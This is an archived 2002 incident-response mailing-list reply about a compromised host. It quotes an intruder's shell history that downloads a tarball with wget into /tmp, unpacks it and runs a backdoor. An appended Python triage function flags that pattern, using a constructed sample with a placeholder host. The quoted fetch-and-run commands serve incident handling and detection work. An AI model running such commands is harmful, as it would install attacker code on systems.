Security Incidents mailing list archives
Re: Rooted, .haos on system
From: Mike Katz <mike () procinct com>
Date: Mon, 16 Dec 2002 11:31:23 -0800
At 12/16/2002 10:47 AM, Damian Gerow wrote:
> Left in the .bash_history was this:
>
> w
> cd /tmp
> wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
> ./epc
>
> A quick check tells me that 'epc' is a backdoor utility, and the other
> file contained within loc.tgz looks like a trojaned 'su'.
>
> I've already notified Geocities abuse, and haven't heard back from them
> yet.

Note that the file does not appear to be stored on the Geocities site; the Geocities site redirects to http://www.djteckh.com/loc.tgz, which is a Yahoo domain.

Michael Katz
mike () procinct com
Procinct Security

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
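
A triage check for the sequence in the quoted .bash_history (fetch into a staging directory, unpack, run a relative path), as an added example that is not part of the original message. The function name, the tool and directory lists, and the sample lines with their placeholder host are assumptions constructed for illustration.

```python
import posixpath
import re
import shlex

STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")      # assumed world-writable dirs
FETCHERS = {"wget", "curl", "fetch", "lynx", "ftp"}  # assumed download tools

# Constructed sample shaped like the quoted history; the host is a placeholder.
CONSTRUCTED_HISTORY = [
    "w",
    "cd /tmp",
    "wget files.example.invalid/loc.tgz; tar xvzf loc.tgz",
    "./epc",
]

def triage_history(lines, start_dir="~"):
    """Flag `./name` runs in a directory that received a download earlier.

    The working directory is followed through `cd` (not `cd -`), so the
    execution is tied to the place where the fetched file landed.
    """
    cwd, downloads, findings = start_dir, {}, []
    for lineno, raw in enumerate(lines, 1):
        # One history line may hold several commands joined by ; && ||
        for cmd in re.split(r";|&&|\|\|", raw):
            try:
                argv = shlex.split(cmd)
            except ValueError:          # unbalanced quotes in the history
                argv = cmd.split()
            if not argv:
                continue
            tool = argv[0].rsplit("/", 1)[-1]
            if tool == "cd" and len(argv) > 1:
                dest = argv[1]
                cwd = posixpath.normpath(
                    dest if dest.startswith("~") else posixpath.join(cwd, dest))
            elif tool in FETCHERS:
                sources = [a for a in argv[1:] if not a.startswith("-")]
                downloads.setdefault(cwd, []).extend(sources)
            elif argv[0].startswith("./") and cwd in downloads:
                staged = any(cwd == d or cwd.startswith(d + "/")
                             for d in STAGING_DIRS)
                findings.append({"line": lineno, "cwd": cwd,
                                 "executed": argv[0],
                                 "fetched": list(downloads[cwd]),
                                 "world_writable": staged})
    return findings
```

Shell history is writable by whoever holds the account, so an empty result from this check says nothing about whether the host is clean.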
